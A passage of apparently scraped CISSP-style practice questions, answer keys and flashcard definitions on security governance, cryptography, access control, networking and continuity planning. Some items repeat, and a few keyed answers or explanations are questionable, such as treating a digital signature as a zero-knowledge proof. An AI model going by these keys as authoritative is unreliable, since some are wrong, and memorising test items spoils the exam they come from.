D. The steps normally involved in the discovery of electronically stored information, or e-Discovery, are identifying, preserving, collecting, processing, reviewing, analyzing, and producing the data in compliance with the court order. Data remanence is not part of e-Discovery, though it could influence the process.

John is a manager of the application development department within his company. He needs to make sure his team is carrying out all of the correct testing types and at the right times of the development stages. Which of the following accurately describe types of software testing that should be carried out? i. Unit testing: Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions. ii. Integration testing: Verifying that components work together as outlined in design specifications. iii. Acceptance testing: Ensuring that the code meets customer requirements. iv. Regression testing: After a change to a system takes place, retesting to ensure functionality, performance, and protection. A. i, ii B. ii, iii C. i, ii, iv D. i, ii, iii, iv

D. There are different types of tests the software should go through because there are different potential flaws we will be looking for. The following are some of the most common testing approaches: Unit testing Testing individual components in a controlled environment where programmers validate data structure, logic, and boundary conditions Integration testing Verifying that components work together as outlined in design specifications Acceptance testing Ensuring that the code meets customer requirements Regression testing After a change to a system takes place, retesting to ensure functionality, performance, and protection

What needs to take place for an environment using XTACACS to be compatible with an environment using TACACS+? A. The use of RADIUS will allow for this conversion to take place. B. The use of Diameter will allow for this conversion to take place. C. They are backwards compatible, so no conversion is necessary. D. There is no interoperability between them. They are two totally different protocols.

D. There is no interoperability between them. They are two totally different protocols.

Kerberos is a commonly used access control and authentication technology. It is important to understand what the technology can and cannot do and its potential downfalls. Which of the following is not a potential security issue that must be addressed when using Kerberos? i. The KDC can be a single point of failure. ii. The KDC must be scalable. iii. Secret keys are temporarily stored on the users' workstations. iv. Kerberos is vulnerable to password guessing. A. i, iv B. iii C. All of them D. None of them

D. These are all issues that are directly related to Kerberos. These items are as follows: The KDC can be a single point of failure. If the KDC goes down, no one can access needed resources. Redundancy is necessary for the KDC. The KDC must be able to handle the number of requests it receives in a timely manner. It must be scalable. Secret keys are temporarily stored on the users' workstations, which means it is possible for an intruder to obtain these cryptographic keys. Session keys are decrypted and reside on the users' workstations, either in a cache or in a key table. Again, an intruder can capture these keys. Kerberos is vulnerable to password guessing. The KDC does not know if a dictionary attack is taking place.

Both block and stream algorithms use initialization vectors. Which of the following is not a reason that they are used? A. They are used to add randomness to the encryption process. B. They ensure that two identical plaintext values result in different ciphertext values when encrypted with the same key. C. They provide extra protection in case an implementation is using the same symmetric key more than one time. D. They are XORed to the plaintext after encryption to ensure more randomness to the process.

D. They are XORed to the plaintext after encryption to ensure more randomness to the process.

What is the main advantage of using hot sites? A. Costs are relatively low. B. They can be used for an extended amount of time. C. They do not require that equipment and systems software be compatible with the primary installation being backed up. D. They can be made ready for operation quickly.

D. They can be made ready for operation quickly.

Which of the following is not a critical purpose served by log collection, preservation, and review? A. They can be used to verify the ongoing consistency and effectiveness of security controls. B. They can be used to detect abnormal events that may indicate malicious activities. C. They can be used as part of an investigation into detected incidents to piece together a timeline of events. D. They can be used to monitor routine activities and system utilization.

D. They can be used to monitor routine activities and system utilization.

Which of the following is not true of application-level proxy firewalls? A. They provide a higher level of protection than circuit-level firewalls. B. They hide network information from external entities. C. One proxy per service is needed. D. They improve network performance.

D. They improve network performance.

Which of the following is not a reason why fax servers are used in many companies? A. They save money on individual fax devices and paper. B. They provide a secure way of faxing instead of having faxed paper sitting in bins waiting to be picked up. C. Faxes can be routed to employee electronic mailboxes. D. They reduce the need for any other communication security mechanisms.

D. They reduce the need for any other communication security mechanisms.

In discretionary access control security, who has delegation authority to grant access to data? A. User B. Security officer C. Security policy D. Owner

D. This question may seem a little confusing if you were stuck between user and owner. Only the data owner can decide who can access the resources she owns. She may or may not be a user. A user is not necessarily the owner of the resource. Only the actual owner of the resource can dictate what subjects can actually access the resource.

Frank is responsible for the security of his company's online applications, web servers, and web-based activities. The web applications have the capability of being dynamically "locked" so that multiple users cannot edit a web page at the same time and overwrite each other's work. An audit uncovered that although this software-locking capability was properly configured, multiple users were still able to modify the same web page at the same time. Which of the following best describes what is taking place in this situation? A. Buffer overflow. B. Blind SQL injection. C. Cross-site request forgery. D. Time of check/time of use attack.

D. Time of check/time of use attack

Your company's CIO has stressed the need for an immediate incident response plan to be created. What is the best reason for this mandate? A. To improve the company's reputation with stockholders. B. To improve the executive team's compliance with due diligence regulations. C. To improve employee morale and retention. D. To improve the likelihood that the company could effectively react to a disruption.

D. To improve the likelihood that the company could effectively react to a disruption.

Which of the following attributes are added beyond traditional access control mechanisms (RBAC, MAC, and DAC) in order to implement ABAC? A. Subjects B. Objects C. Actions D. Context

D. Traditional methods such as role-based access control (RBAC), mandatory access control (MAC), and discretionary access control (DAC) each rely on categories of subjects and objects, and assign actions that can be performed based on combinations of the two. Attribute-based access control (ABAC) includes contexts, such as the time of day, the state or phase of a project, and other contextual events, in order to provide further granularity to which objects can be accessed by which subjects, when, and how.

The purpose of security awareness training is to expose personnel to security issues so that they may be able to recognize them and better respond to them. Which of the following is not normally a topic covered in security awareness training? A. Social engineering B. Phishing C. Whaling D. Trolling

D. Trolling is the term used to describe people who sow discord on various social platforms on the Internet by starting arguments or making inflammatory statements aimed at upsetting others. This is not a topic normally covered in security awareness training. Social engineering, phishing, and whaling are important topics to include in any security awareness program.

An attack that changes the source IP address of an ICMP echo request packet so it appears as though it came from the victim and is broadcast to an amplifying network can be called all of the following except: A. Smurf B. ICMP storm C. DoS D. Tunneling

D. Tunneling

The biometric system has been known to accept imposters. This is known as which type of error? A. CER B. Bio-acceptance error C. Type I D. Type II.

D. Type II.

Which of the following is not considered an operational assurance responsibility? A. Separation of privileged and user program code. B. Auditing and monitoring capabilities. C. Trusted recovery when the product experiences unexpected circumstances. D. Unit and integration testing.

D. Unit and integration testing.

The operating system performs all except which of the following tasks? A. Memory allocation. B. Input and output tasks. C. Resource allocation. D. User access to database views.

D. User access to database views.

What are two types of wireless proximity identification devices? A. Biometric devices and access control devices. B. Swipe card devices and passive devices. C. Preset code devices and wireless devices. D. User-activated devices and system sensing devices.

D. User-activated devices and system sensing devices.

The COSO framework, developed by the Committee of Sponsoring Organizations (COSO) of the Treadway Commission in 1985, was developed to deal with fraudulent financial activities and reporting. The COSO framework is made up of all of the following components except: i. Control environment ii. Risk assessment iii. Control activities iv. Information and communication v. Accreditation A. iii, iv B. ii, v C. i, ii D. v

D. v

An accurate picture of the use and acceptance of biometrics is: A. Relatively inexpensive, well received by society, and highly accurate. B. Very expensive, moderately received by society, and moderately accurate. C. Very expensive, very well received by society, and highly accurate. D. Very expensive, not well received by society, and highly accurate.

D. Very expensive, not well received by society, and highly accurate.

Which of the following is not a benefit of VoIP? A. Cost B. Convergence C. Flexibility D. Security

D. Voice over Internet Protocol (VoIP) refers to transmission technologies that deliver voice communications over IP networks. IP telephony uses technologies that are similar to TCP/IP, so its vulnerabilities are also similar. The voice system is vulnerable to application manipulation (such as toll fraud and blocking), unauthorized administrative access, and poor implementation. In terms of the network and media, it is also vulnerable to denial-of-service attacks against the gateways and network resources. Eavesdropping is also a concern, since data traffic is sent in cleartext unless it is encrypted.

Which of the following is a common association of the Clark-Wilson access model? A. Chinese wall. B. Access tuple. C. Read up and write down rule. D. Well-formed transactions.

D. Well-formed transactions.

Which of the following is the best countermeasure that John's team should implement to protect from improper caching issues? A. PKI B. DHCP snooping C. ARP protection D. DNSSEC

D. When a DNS server receives an improper (potentially malicious) name resolution response, it will cache it and provide it to all the hosts it serves unless DNSSEC is implemented. If DNSSEC were enabled on a DNS server, then the server would, upon receiving a response, validate the digital signature on the message before accepting the information to make sure that the response is from an authorized DNS server.

In computer programming, cohesion and coupling are used to describe modules of code. Which of the following is a favorable combination of cohesion and coupling? A. Low cohesion, low coupling B. High cohesion, high coupling C. Low cohesion, high coupling D. High cohesion, low coupling

D. When a module is described as having high cohesion and low coupling, that is a good thing. Cohesion reflects how many different types of tasks a module can carry out. High cohesion means that the module carries out one basic task (such as subtraction of values) or several tasks that are very similar (such as subtraction, addition, multiplication). The higher the cohesion, the easier it is to update or modify and not affect the other modules that interact with it. This also means the module is easier to reuse and maintain because it is more straightforward when compared to a module with low cohesion. Coupling is a measurement that indicates how much interaction one module requires to carry out its tasks. If a module has low or loose coupling, this means the module does not need to communicate with many other modules to carry out its job. These modules are easier to understand and easier to reuse than those that depend upon many other modules to carry out their tasks. It is also easier to make changes to these modules without affecting many modules around them.

Use the following scenario to answer Questions 35-36. Zack is a security consultant who has been hired to help an accounting company improve some of their current e-mail security practices. The company wants to ensure that when their clients send the company accounting files and data, the clients cannot later deny sending these messages. The company also wants to integrate a more granular and secure authentication method for their current mail server and clients. Which of the following best describes how client messages can be dealt with and addresses the first issue outlined in the scenario? A. The company needs to integrate a public key infrastructure and the Diameter protocol. B. Clients must encrypt messages with their public key before sending them to the accounting company. C. The company needs to have all clients sign a formal document outlining nonrepudiation requirements. D. Clients must digitally sign messages that contain financial information.

D. When clients digitally sign messages, this ensures nonrepudiation. Since the client should be the only person who has his private key, and only his public key can decrypt it, the e-mail must have been sent from the client. Digital signatures provide nonrepudiation protection, which is what this company needs.

Which of the following statements is false? A. A disaster recovery team's primary task is to restore critical business functions at the alternate backup processing site. B. A disaster salvage team's task is to ensure that the primary site returns to normal processing conditions. C. The disaster recovery plan should include how the company will return from the alternate site to the primary site. D. When returning to the primary site, the most critical applications should be brought back first.

D. When returning to the primary site, the most critical applications should be brought back first.

Which of the following best describes why rebooting helps with system performance in the situation described in this scenario? A. Software is not using cache memory properly. B. Software is carrying out too many mode transitions. C. Software is working in ring 0. D. Software is not releasing unused memory.

D. When software is poorly written, it could be allocating memory and not properly releasing it. This can affect the performance of the whole system, since all software processes have to share a limited supply of memory. When a system is rebooted, the memory allocation constructs are reset.

When is it acceptable to not take action on an identified risk? A. Never. Good security addresses and reduces all risks. B. When political issues prevent this type of risk from being addressed. C. When the necessary countermeasure is complex. D. When the cost of the countermeasure outweighs the value of the asset and potential loss.

D. When the cost of the countermeasure outweighs the value of the asset and potential loss.

Which of the following best describes why Tim should be concerned about the second issue addressed in the scenario? A. Software and devices that are scanning traffic for suspicious activity may only be configured to evaluate one system type. B. Software and devices that are monitoring traffic for illegal activity may only be configured to evaluate one service type. C. Software and devices that are monitoring traffic for illegal activity may only be configured to evaluate two protocol types. D. Software and devices that are monitoring traffic for suspicious activity may only be configured to evaluate one traffic type.

D. While many of these automatic tunneling techniques reduce administration overhead because network administrators do not have to configure each and every system and network device with two different IP addresses, there are security risks that need to be understood. Many times users and network administrators do not know that automatic tunneling capabilities are enabled, and thus they do not ensure that these different tunnels are secured and/or are being monitored. If you are an administrator of a network and have IDS, IPS, and firewalls that are only configured to monitor and restrict IPv4 traffic, then all IPv6 traffic could be traversing your network insecurely. Attackers use these protocol tunnels and misconfigurations to get past these types of security devices so that malicious activities can take place unnoticed. Products and software may need to be updated to address both traffic types, proxies may need to be deployed to manage traffic communication securely, IPv6 should be disabled if not needed, and security appliances need to be configured to monitor all traffic types.

Wireless LAN technologies have gone through different versions over the years to address some of the inherent security issues within the original IEEE 802.11 standard. Which of the following provides the correct characteristics of Wi-Fi Protected Access 2 (WPA2)? A. IEEE 802.1X, WEP, MAC B. IEEE 802.1X, EAP, TKIP C. IEEE 802.1X, EAP, WEP D. IEEE 802.1X, EAP, CCMP

D. Wi-Fi Protected Access 2 requires IEEE 802.1X or preshared keys for access control, EAP or preshared keys for authentication, and the AES algorithm in counter mode with CBC-MAC Protocol (CCMP) for encryption.

Which of the following statements is true of audits conducted by external parties? A. They are inherently adversarial in nature, as the entity under inspection must seek to limit the extent of adverse findings, while the external party must seek to maximize them. B. Participation by the internal teams within the entity under inspection must be kept to a bare minimum, so as not to skew the objectivity of the external teams' findings. C. The terms of any contractual obligations relevant to the controls being audited must be kept confidential and not divulged to the external party conducting the inspection, so as not to skew the objectivity of the external teams' methodology or framework. D. The activities of the internal and external teams must be collaborative in nature, so as to maximize the auditor's ability to accurately assess the controls under inspection.

D. Without a high degree of collaboration and cooperation between the teams on both sides, any such audit will be far less likely to come to an accurate assessment of the state of the security controls being inspected. An adversarial approach will greatly decrease the overall value of the effort, while simultaneously increasing the cost of performing it. One of the main goals of any external audit is to engender trust, which invariably requires honest and active cooperation among all participants.

Should kernel-level flaws be a significant concern if found during a security assessment? Why? A. No, because they are relatively rare. B. No, because they typically are too difficult to exploit. C. No, because they are the easiest to remediate. D. Yes, because a successful exploit of them gives the attacker system-level control.

D. Yes, because a successful exploit of them gives the attacker system-level control.

If Marge uses her private key to create a digital signature on a message she is sending to George, but she does not show or share her private key with George, what is it an example of? A. Key clustering B. Avoiding a birthday attack C. Providing data confidentiality D. Zero knowledge proof

D. Zero knowledge proof means that someone can tell you something without telling you more information than you need to know. In cryptography, it means proving that you have a specific key without sharing that key or showing it to anyone. A zero knowledge proof is an interactive method for one party to prove to another that a (usually mathematical) statement is true without revealing anything sensitive.

What mechanism can be used to ensure that a failed transaction or system failure returns the subject to a meaningful point in some process? A. Bookmark. B. Cyclical redundancy check. C. Inference. D. Checkpoint.

D. Checkpoint.

Each distinguished name (DN) in an LDAP directory represents a collection of attributes about a specific object and is stored in the directory as an entry. DNs are composed of Common Name (CN) components, which describe an object, and Domain Components (DC) which describe the domain in which the object resides. Which of the following makes the most sense when constructing a DN? A. DC= Shon Harris, cn= Logical security, dc=com. B. Cn=Shon harris, dc=LogicalSecurity, dc=com. C. cn=Shon Harris, cn=LogicalSEcurity,CN=com D. cn=Shon Harris,dc=LogicalSecurity, dc=com

D. cn=Shon Harris,dc=LogicalSecurity, dc=com

Which of the following is the LEAST effective security control regarding sensitive data stored on mobile devices? A. Back up all devices to an organizationally managed repository. B. Implement full-volume encryption on all mobile devices. C. Require that all mobile devices be remotely wipeable if stolen or misplaced. D. Enact a policy prohibiting the access or storage of sensitive corporate data on personal mobile devices.

D. Enact a policy prohibiting the access or storage of sensitive corporate data on personal mobile devices.

Certain types of attacks have been made more potent by which of the following advances to microprocessor technology? A. Increased circuits, cache memory, and multiprogramming. B. Dual mode computation. C. Direct memory access I/O. D. Increases in processing power.

D. Increases in processing power.

Which of the following advances to microprocessor architecture has increased some vulnerabilities? A. Distributed environments. B. Network connectivity. C. Increased circuits, cache memory, and multiprogramming. D. Increases in processing power.

D. Increases in processing power.

What is the Network Time Protocol (NTP), and why is it important in security assessments? A. It is a peer-to-peer protocol for system time synchronization, and it is important to ensure that peer systems' time-based authentication functions properly. B. It is a client/server protocol for system time synchronization, and it is important to ensure that peer systems' time-based authentication functions properly. C. It is a peer-to-peer protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems. D. It is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

D. It is a client/server protocol for system time synchronization, and it is important to ensure that system logs have timestamps that are consistent across all critical systems.

An elliptic curve cryptosystem is an asymmetric algorithm. What sets it apart from other asymmetric algorithms? A. it provides digital signatures, secure key distribution, and encryption. B. it computes discrete logarithms in a finite field. C. it uses a larger percentage of resources to carry out encryption. D. it is more efficient.

D. it is more efficient.

Which of the following correctly describes a drawback of symmetric key systems? A. computationally less intensive than asymmetric systems. B. work much more slowly than asymmetric systems. C. carry out mathematically intensive tasks. D. key must be delivered via secure courier.

D. key must be delivered via secure courier.

Which of the following is not an attack against operations? A. brute force. B. Denial of service. C. Buffer overflow D. known plaintext attack

D. known plaintext attack

If a systems development life cycle methodology is inadequate, the most serious risk is likely to be that the project: A. will be completed late. B. Will exceed cost estimates. C. Will be incompatible with existing systems. D. will fail to meet business and user needs.

D. will fail to meet business and user needs.

Should kernel-level flaws be a significant concern if found during a security assessment? Why? A. No, because they are relatively rare. B. No, because they are typically too difficult to exploit. C. No, because they are the easiest to remediate. D. Yes, because a successful exploit of them gives the attacker system-level control.

D. Yes, because a successful exploit of them gives the attacker system-level control.

As with logical access controls, audit logs should be produced and monitored for physical access controls. Which of the following statements is correct about auditing physical access? A. unsuccessful access attempts should be logged but only need to be reviewed by a security guard. B. Only successful access attempts should be logged and reviewed. C. Only successful access attempts should be logged and reviewed. D. All unsuccessful access attempts should be logged and reviewed.

D. All unsuccessful access attempts should be logged and reviewed.

Which of the following is not an example of due care? A. Providing security awareness training to all employees. B. Requiring employees to sign nondisclosure agreements. C. Implementing mandatory vacations for all employees. D. Allowing a key job function to be completed by one highly qualified employee.

D. Allowing a key job function to be completed by one highly qualified employee.

Integrity

Hashing (data integrity); configuration management (system integrity); change control (process integrity); access control (physical and technical); software digital signing; transmission cyclic redundancy check (CRC) functions.

Security Program Development

ISO/IEC 27000 series: International standards on how to develop and maintain an ISMS developed by ISO and IEC.

Software License Agreement

Individuals who may use the software; amount of information that may be processed; locations of use; number of servers.

TOGAF

Model and methodology for the development of enterprise architectures, developed by The Open Group.

OECD

Organization for Economic Cooperation and Development

Risk Categories

Physical; human interaction; equipment malfunction; inside and outside attacks; misuse of data; loss of data; application error.

Preventive: Administrative

Policies and procedures; effective hiring practices; pre-employment background checks; controlled termination processes; data classification and labeling; security awareness.

Controls

Preventive: intended to avoid an incident from occurring. Detective: helps identify an incident's activities and potentially an intruder. Deterrent: intended to discourage a potential attacker. Recovery: intended to bring the environment back to regular operations. Compensating: controls that provide an alternative measure of control.

Encryption

Process of converting readable data into unreadable characters to prevent unauthorized access.

ITIL

Process to allow for IT service management, developed by the United Kingdom's Office of Government Commerce.

FERPA

Regulates handling of student educational records; provides right of inspection; provides right to request corrections; restricts release of personal information.

Which of the following memory types utilizes a clock cycle to improve its efficiency? A. DRAM B. SDRAM C. BEBO DRAM D. PROM

B. SDRAM

PII Elements

Social Security numbers; driver's license numbers; bank account numbers. Notify individuals if there is a breach.

18 USC 2701 et seq

Stored wire and electronic communications and transactional records access

job rotation

a job enrichment strategy that involves moving employees from one job to another

Corruption/modification is one of the biggest threats to an operations environment. Which of the following is the typical culprit in this type of threat?

a. Employees

How many bits make up the effective DES key? A. 56 B. 64 C. 32 D. 16

A. 56

Baselines

A minimum level of security.

Digital certificates

A technology used to associate a user's identity to a public key.

Water is most effective against: A. Class A fires B. Class B fires C. Class C fires D. Class F fires.

A. Class A fires.

Machine language exists in which of the following categories? A. Generation one. B. Generation two. C. Generation three. D. Generation four.

A. Generation one.

IPSec uses ___ for key management. A. IKE. B. MPLS C. PPP D. NAT

A. IKE.

Isochronous processes rely on ___ A. Time constraints B. Content variables C. Error Checking D. Malformed packets

A. Time constraints

Which type of access control model allows data owners to be the ultimate source for determining access to system resources? A. Discretionary. B. Mandatory. C. Brewer and Nash. D. Clark-Wilson.

A. Discretionary.

Tactical planning is: A. Mid-term B. Long-term C. Day-to-day D. Six months.

A. Mid-term

Which of the following is not addressed by the data retention policy? A. What data to keep B. For whom data is kept C. How long data is kept D. Where data is kept

B. For whom data is kept

What agency usually works with the FBI when investigating computer crimes? A. (ISC)2 B. Secret Service. C. CIA. D. State Police.

B. Secret Service.

What is the biggest challenge with respect to paper records? A. They contain sensitive information. B. Technical controls cannot easily be applied. C. They are difficult to destroy. D. Watermarking is easy to defeat.

B. Technical controls cannot easily be applied.

Production code should come only from which of the following? A. The project's lead developer. B. The librarian in charge of the repository. C. The approved project manager. D. The quality assurance testing team.

B. The librarian in charge of the repository.

Guidelines

Recommended actions and operational guides to users

COSO Framework

control environment, risk assessment, control activities, information and communication, monitoring

What is maximum tolerable downtime (MTD)? A. The maximum elapsed time required to complete the recovery of application data. B. Minimum elapsed time required to complete the recovery of application data. C. The number of minutes allowed within the SLA. D. Maximum delay businesses can tolerate and still remain viable.

D. Maximum delay businesses can tolerate and still remain viable.

GDPR Provisions

Consent; right to be informed; right to restrict processing; right to be forgotten; data breaches.

Which of the following describes a cold site? A. Fully equipped and operational in a few hours B. Partially equipped with data processing equipment C. Expensive and fully configured D. Provides environmental measures but no equipment

D. A cold site only provides environmental measures—wiring, air conditioning, raised floors—basically a shell of a building and no more.

Who was involved in developing the first public key encryption system? A. Adi Shamir B. Ross Anderson C. Bruce Schneier D. Martin Hellman

D. Martin Hellman

Paul needs to outline different exercise types for the various systems in the environment. Which of the following does not provide the correct mapping of exercise types that Paul needs to implement? A. Low-impact systems, a tabletop exercise. B. Moderate-impact systems, a functional exercise. C. High-impact systems, a full-scale functional exercise. D. Medium-impact systems, a structured walk-through.

D. Medium-impact systems, a structured walk-through.

Risk Management

Physical damage; human interaction; equipment malfunction; inside and outside attacks; misuse of data; loss of data; application error.

COBIT

A framework developed by the Information Systems Audit and Control Association and the IT Governance Institute. Defines the goals for the controls that should be used to properly manage IT and ensure IT maps to business needs. Four domains: Plan and Organize, Acquire and Implement, Deliver and Support, and Monitor and Evaluate

Quantitative Risk Analysis

A numerical assessment of the probability and impact of the identified risks. Quantitative risk analysis also creates an overall risk score for the project.

Capability Maturity Model Integration (CMMI)

A process improvement approach that provides organizations with the essential elements of effective processes

Quantitative risk analysis

A risk analysis method that attempts to use percentages in damage estimations and assigns real numbers to the costs of countermeasures for particular risks and the amount of damage that could result from the risk. Compare to qualitative risk analysis.

Alice, Bob, and many of their colleagues have spent months constructing a business continuity plan (BCP) for their enterprise. What is the first test of their findings that should be conducted? A. Checklist test. B. Structured walk-through test. C. Simulation test. D. Parallel test.

A. Checklist test.

Crime prevention through environmental design (CPTED) is a discipline that outlines how the proper design of a physical environment can reduce crime by directly affecting human behavior. Of CPTED's three main components, what is illustrated in the following photo? A. Natural surveillance. B. Target hardening. C. Natural access control. D. Territorial reinforcement.

A. Natural surveillance.

Which of the following laws addresses wiretapping? A. Computer Fraud and Abuse Act of 1986 B. Electronic Communications Privacy Act of 1986. C. HIPAA. D. Privacy Act of 1974

B. Electronic Communications Privacy Act of 1986.

Packets that contain routing information within their headers are referred to as what? A. Broadcasting. B. Source Routing C. Forwarding D. Poisoning.

B. Source Routing

Which of the following is NOT a wide area protocol? A. Frame relay B. X.25 C. 802.11 D. MPLS.

C. 802.11

Which of the following ciphers uses a polyalphabetic substitution process? A. Caesar cipher. B. Simple substitution C. Vigenère D. ATBASH

C. Vigenère

Which of the following best describes the situation that the network administrators are experiencing? A. Brownouts. B. Surges. C. In-rush current. D. Power line interference

C. In-rush current

In twisted-pair cabling, the tighter the wire is twisted, the more resistant the cable is to: A. Attenuation and breaking B. Causing fire hazards C. Interference and attenuation D. Corrosion.

C. Interference and attenuation

Which is not a preventive physical security control? A. Fences. B. Locks C. Security guard. D. Access and audit log.

D. Access and audit log.

At which phase of the system development life cycle (SDLC) is it most important for security to be considered? A. Operations/Maintenance. B. Implementation. C. Acquisition/Development. D. Initiation.

D. Initiation.

What does the security auditor report to? A. Data owners. B. Data custodians C. External audit organizations D. Senior management.

D. Senior management.

The attackers in this situation would be seen as which of the following? A. Vulnerability B. Threat C. Risk D. Threat agent

D. The attackers are the entities that have exploited a vulnerability; thus, they are the threat agent.

A digital identity is made up of attributes, entitlements, and traits. Which of the following has the incorrect mapping when considering these identity characteristics? A. Attributes = department, role in company, shift time, clearance. B. Entitlements = resources available to user, authoritative rights in the company. C. Traits = biometric information, height, sex. D. None of the above.

D. None of the above.

All of the following controls are important to specify when defining a data classification scheme, except: A. Marking, labeling, and handling procedures B. Physical security protections. C. Backup and recovery procedures. D. Personnel clearance procedures.

D. Personnel clearance procedures.

If sensitive data is stored on a CD-ROM and it is no longer needed, which would be the proper way of disposing of the data? A. Degaussing. B. Erasing. C. Purging D. Physical destruction.

D. Physical destruction.

Which would require the lowest level of protection? A. System logs B. Backup copies of system logs C. Hard copies of sensitive company information D. User training documentation.

D. User training documentation.

Security Governance

Information Governance Committee; Risk Management Committee; Board of Directors.

Availability Controls

Malicious attackers; component failures; application failures; utility failures.

ITIL

The Information Technology Infrastructure Library (ITIL) is a set of concepts and practices for Information Technology Services Management (ITSM), Information Technology (IT) development and IT operations. ITIL gives detailed descriptions of a number of important IT practices and provides comprehensive checklists, tasks and procedures that any IT organization can tailor to its needs.

18 USC 2510 et Seq

Wire and electronic communications interception and interception of oral communications

Jared plays a role in his company's data classification system. In this role, he must practice due care when accessing data and ensure that the data is used only in accordance with allowed policy while abiding by the rule set for the classification of the data. He does not determine, maintain, or evaluate controls, so what is Jared's role? A. Data owner B. Data custodian C. Data user D. Information systems auditor

C. Data user

Building a business case

Justify the investment of time and money; balance security and business concerns; achieve confidentiality, integrity, and availability goals.

Patch management

Keeping operating systems and applications patched to current levels also enhances availability.

copyright

Protects creative works against theft: works, web content, art, music, computer software. Granted to the creator automatically. Provided for 70 years beyond the creator's death. Covered work moves to the public domain after expiration.

Security Policy

Provide the foundation for a security program; are written carefully over a long period of time; require compliance from all employees.

Corporate Acquisition

Organizations come together, so redundancies between security systems are eliminated.

Corporate divestiture

Requires separate controls.

John is a security engineer at a company that develops highly confidential products for various government agencies. While his company has VPNs set up to protect traffic that travels over the Internet and other nontrusted networks, he knows that internal traffic should also be protected. Which of the following is the best type of approach John's company should take? A. Implement a data link technology that provides 802.1AE security functionality. B. Implement a network-level technology that provides 802.1AE security functionality. C. Implement TLS over L2TP. D. Implement IPSec over L2TP.

A. 802.1AE is the IEEE MAC Security standard (MACSec), which defines a security infrastructure to provide data confidentiality, data integrity, and data origin authentication. Where a VPN connection provides protection at the higher networking layers, MACSec provides hop-by-hop protection at layer 2.

Use the following scenario to answer Questions 48-49. Frank is the new manager of the in-house software designers and programmers. He has been telling his team that before design and programming on a new product begins, a formal architecture needs to be developed. He also needs this team to understand security issues as they pertain to software design. Frank has shown the team how to follow a systematic approach that allows them to understand how different compromises could take place with the software products they develop. Which of the following best describes what an architecture is in the context of this scenario? A. Tool used to conceptually understand the structure and behavior of a complex entity through different views B. Formal description and representation of a system and the components that make it up C. Framework used to create individual architectures with specific views D. Framework that is necessary to identify needs and meet all of the stakeholder requirements

A. An architecture is a tool used to conceptually understand the structure and behavior of a complex entity through different views. An architecture provides different views of the system, based upon the needs of the stakeholders of that system.

Which of the following are acceptable components of NIST's Digital Signature Standard (DSS)? A. Asymmetric algorithms DSA, RSA, ECDSA, and SHA for hashing. B. Asymmetric RSA, symmetric AES, and MD5 for hashing. C. Asymmetric DSA, symmetric AES, and SHA for hashing. D. Only symmetric AES and SHA for hashing.

A. Asymmetric algorithms DSA, RSA, ECDSA, and SHA for hashing.

Critical support areas are defined as: A. Business units or functions that must be present to sustain continuity of business, maintain life safety, and avoid public embarrassment. B. Business units or functions that may be replaced by others in a disaster situation. C. Human resource and information technologies D. Business units or functions that require support against manmade disasters.

A. Business units or functions that must be present to sustain continuity of business, maintain life safety, and avoid public embarrassment.

How is data normalization accomplished in a data warehouse? A. By removing redundancies. B. By removing dissimilar information. C. By creating heterogeneous tuples. D. By creating heterogeneous attributes.

A. By removing redundancies.

Jan's company has kicked off a huge software development effort. The project will affect every department and has representatives from each group on the development team. The team is using automated tools and mechanisms to help reduce cost and streamline the process. Of the following development types, which sounds like the one Jan's company is using? A. CASE B. Extreme Programming C. CleanRoom D. RAD

A. CASE

Which of the following produces code that is platform independent? A. Java B. ActiveX C. VB. D. C

A. Java

John is a field service manager for a DSL company. He is fairly confident that one of his senior field technicians is stealing equipment from the company. John immediately notifies the VP of HR about the problem. What is the next step? A. Consult the company's organizational and security policy. B. Immediately suspend the employee and revoke all permissions. C. Because the suspect is a senior-level employee, give him the benefit of the doubt, but begin heavy monitoring. D. Terminate immediately as part of the no-tolerance principle.

A. Consult the company's organizational and security policy.

Which of the following best describes the difference between content and context access control? A. Content access control is based on the sensitivity of the data and context access control is based on prior operations. B. Content access control is based on the prior operations and context access control is based on the sensitivity of the data. C. Context pertains to the use of database views and content access control pertains to tracking the requestor's previous access requests. D. Context pertains to the use of the DAC model and content pertains to the use of the MAC model.

A. Content access control is based on the sensitivity of the data and context access control is based on prior operations.

Determining the geographic location of a client IP address in order to route it toward the most proximal topological source of web content is an example of what technology? A. Content distribution network (CDN) B. Distributed name service (DNS) C. Distributed web service (DWS) D. Content domain distribution (CDD)

A. Content distribution networks (CDNs) are designed to optimize the delivery of content, primarily via the Hypertext Transfer Protocol (HTTP), to clients based on their global topological position. In such a design, multiple web servers hosted at many points of presence on the Internet contain the same content in a globally synchronized manner, and so clients can be directed to the nearest source, typically via the manipulation of DNS records based on geolocation algorithms for the requester's IP address.

Which of the following describes the difference between the Data Encryption Standard and the Rivest-Shamir-Adleman algorithm? A. DES is symmetric, while RSA is asymmetric. B. DES is asymmetric, while RSA is symmetric. C. They are hashing algorithms, but RSA produces a 160-bit hashing value. D. DES creates public and private keys, while RSA encrypts messages.

A. DES is a symmetric algorithm. RSA is an asymmetric algorithm. DES is used to encrypt data, and RSA is used to create public/private key pairs

An effective method to shield networks from unauthenticated DHCP clients is through the use of ___ on network switches. A. DHCP snooping B. ARP protection C. DHCP shielding D. ARP caching.

A. DHCP snooping

An effective method to shield networks from unauthenticated DHCP clients is through the use of _______________ on network switches. A. DHCP snooping B. DHCP protection C. DHCP shielding D. DHCP caching

A. DHCP snooping ensures that DHCP servers can assign IP addresses to only selected systems, identified by their MAC addresses. Also, advanced network switches now have the capability to direct clients toward legitimate DHCP servers to get IP addresses and to restrict rogue systems from becoming DHCP servers on the network.

Name servers and resolvers are the two primary components of ____. A. DNS. B. ICMP C. IGMP D. PGP

A. DNS.

What does DES stand for? A. Data Encryption Standard. B. Data Encryption System. C. Data Encoding Standard. D. Data Encryption Signature.

A. Data Encryption Standard.

In some cases, two transactions may, in the course of their processing, attempt to access the same portion of a database at the same time, in a way that prevents them from proceeding. Which of the following best describes this type of situation? A. Deadlock B. Corruption C. Deletion D. Misconfiguration.

A. Deadlock

Which of the following best describes why e-mail spoofing is easily executed? A. SMTP lacks an adequate authentication mechanism. B. Administrators often forget to configure an SMTP server to prevent inbound SMTP connections for domains it doesn't serve. C. Keyword filtering is technically obsolete. D. Blacklists are undependable.

